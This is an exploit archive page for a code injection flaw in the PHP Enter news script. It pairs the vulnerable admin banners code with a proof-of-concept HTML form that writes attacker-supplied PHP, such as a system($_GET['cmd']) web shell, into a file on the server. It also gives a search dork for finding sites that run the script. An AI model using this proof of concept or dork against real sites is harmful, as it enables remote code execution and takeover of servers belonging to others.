what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PHP Enter Code Injection

PHP Enter Code Injection
Posted May 8, 2012
Authored by L3b-r1'z

PHP Enter suffers from a code execution vulnerability.

tags | exploit, php, code execution
SHA-256 | 0e40cede5b489ccd4eccd31c3db4cd143a0b5033a7852925e405574541aa09d6

PHP Enter Code Injection

Change Mirror Download
########################################################
#
# Exploit Title : Php Enter Php Code Injection
#
# Author : IrIsT.Ir & Sec4Ever.com
#
# Discovered By : L3b-r1'z
#
# Home : http://IrIsT.Ir & http://Sec4Ever.com
#
# P Blob : http://L3b-r1z.com/
#
# Software Link : http://www.phpenter.net/
#
# Security Risk : High
#
# Version : beta
#
# Tested on : win\XP
#
# Dork : allintext: "Powered by phpEnter.net"
#
# 1) Info Script
# 2) Info Vulnerability
# 3) P0c
#
########################################################
#
# 1) Info Script:
#
# PHP Enter is a free and Open Source PHP News Publishing script.
# It is an online news publishing system that features easy installation,
user submission.
# and an admin panel for adding, editing and removing categories and news.
########################################################
#
# 2) Info Vulnerability :
#
# This exploit allow attacker to inject php code execution like
system($_GET['cmd']);
# In file named banners in admin folder :
#
# 1. <?php
# 2. if(isset($_POST['submit']))
# 3. {
# 4. $ccode = $_POST['code'];
# 5.
# 6. $myFile="horad.php";
# 7. $fh = fopen($myFile, 'w') or die("can't open file- check CHMOD");
# 8. $stringData = "$ccode";
# 9. fwrite($fh, $stringData);
# 10. fclose($fh);
# 11. echo"<br /><center><font size=2
color=green>Successfully.</font></center>";
# 12. }else{
# 13. ?>
#
# Look to line 7 fopen MYFILE , $myfile="horad.php" or die can't open file
check chmod.
# fwrite FH variable and stringdata, So String Data doesn't secure :), can
attacker to inject php code execution.
# Look to line 4 : $_POST['code'];, attacker will inject in POST from any
tool dev, like HTTP LIVE EDITOR, HTTP Live headers.
#
#
#########################################################
#
# 3) p0c :
#
# <form method="post" action="http://localhost/admin/banners.php">
# <center>
# <font color=#3A586A>Code</font><br />
# <textarea name="code"></textarea>
# <br /><br />
# <input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br
/>
# </form>
#
#########################################################
#
# Special Thx to : Irist.ir Team & Sec4ever.com Team
#
#########################################################
#
# Greet'z : Am1r, The Injector, Sec4ever, b0x, Paulzz, Virus-Ra3ech,
Damane2011
# Hacker-1420, Th3 Killer Dz, OVER-X <3, Stalk3r, The Viper, N4ss1m, B07
M4S73R
# Ked-Ans, And All Members Of Irist And Sec4ever Team
#
#########################################################
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close